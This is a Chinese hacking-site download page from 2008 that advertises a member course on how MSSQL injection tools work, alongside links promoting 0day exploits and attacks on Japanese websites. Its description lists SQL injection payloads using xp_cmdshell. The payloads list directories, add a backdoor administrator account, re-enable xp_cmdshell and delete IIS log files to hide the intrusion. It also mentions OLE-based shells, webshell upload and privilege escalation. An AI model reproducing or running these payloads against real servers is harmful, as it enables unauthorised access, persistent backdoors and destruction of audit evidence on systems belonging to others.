首页 | 文章 | 软件 | 动画 | 资源 | 励志 | 骗术 | 论坛 | 邮箱 | 会员中心 | 军事 | 科技 | Blog | 图片 | 最近更新 | 爱心红客
三天学会个人安全防御
两周学会制作个人网站
一个月会入侵日本网站
动易最新漏洞工具+修补方法
DZ5.0漏洞利用动画后续
dz5.0论坛20070day
动易2007最新漏洞0day
首页 | VIP工具 | VIP教程 | 光盘下载 | 电子书 | 菜鸟入门 | 安全专题 | 网络安全 | C语言 | Asp.net | Delphi | Php | Mysql | Java | Tcpip | Asp | Linux
 您现在的位置: 爱国者安全网 >> 会员下载 >> 会员下载 >> VIP课程 >> 下载信息
MSSQL注入工具的原理实现
 软件大小: 38800 K
 软件语言: 简体中文
 软件类型: 会员软件
 运行环境: Win9x/NT/2000/XP/2003
 添加时间: 2008-3-13 1:35:52
 软件评级: ★★★
 授权方式: 免费版
 开 发 商: 3800hk
 软件添加:

admin

软件介绍:

欢迎大家来到爱国者安全网学习,大家好,我是蔷薇。

主题:MSSQL注入工具的原理实现

内容:

MSSQL还有许多扩展功能。

1.最常用的数据库的扩展存储过程:exec master..xp_cmdshell
利用它我们可以快速得到一个shell
;exec master..xp_cmdshell 'dir c:\'
;exec master..xp_cmdshell 'net user 123 123/add'
;exec master..xp_cmdshell 'net localgroup administrators 123/add'

如果这个扩展存储不存在我们可以恢复它,用
;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'

我们还可以用xp_cmdshell做其他事情。

;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070301.log >c:\temp.txt'


2.在 MSSQL2000中提供了一个函数用来访问一个叫OLE的对象,通过它可以访问OLE控件,间接的使我们得到一个shell,所用到函数是sp_OACreate和sp_OAMethod

语句我就不写了,没必要去了解,大家知道了这些就可以了。我们通常是用工具的。


3.列目录

4.写入webshell

5.沙盒提权

下载地址: 进入会员下载地址
 相关软件:
ASP注入实践总结
MSSQL暴表爆列
精通注入之ACCESS数据库完全注入
批量注入中的一点技巧
端口映射技术扫盲篇(3)—工具实例详解
 注意事项:
* 为了达到最快的下载速度,推荐使用
* 如果您发现该软件不能下载,请联系本站编辑人员QQ458992,谢谢!
* 欢迎您在本站发布软件作品,详情请点这里
* 未经本站明确许可,任何网站不得非法盗链及抄袭本站资源!
推荐软件
下载排行
推荐排行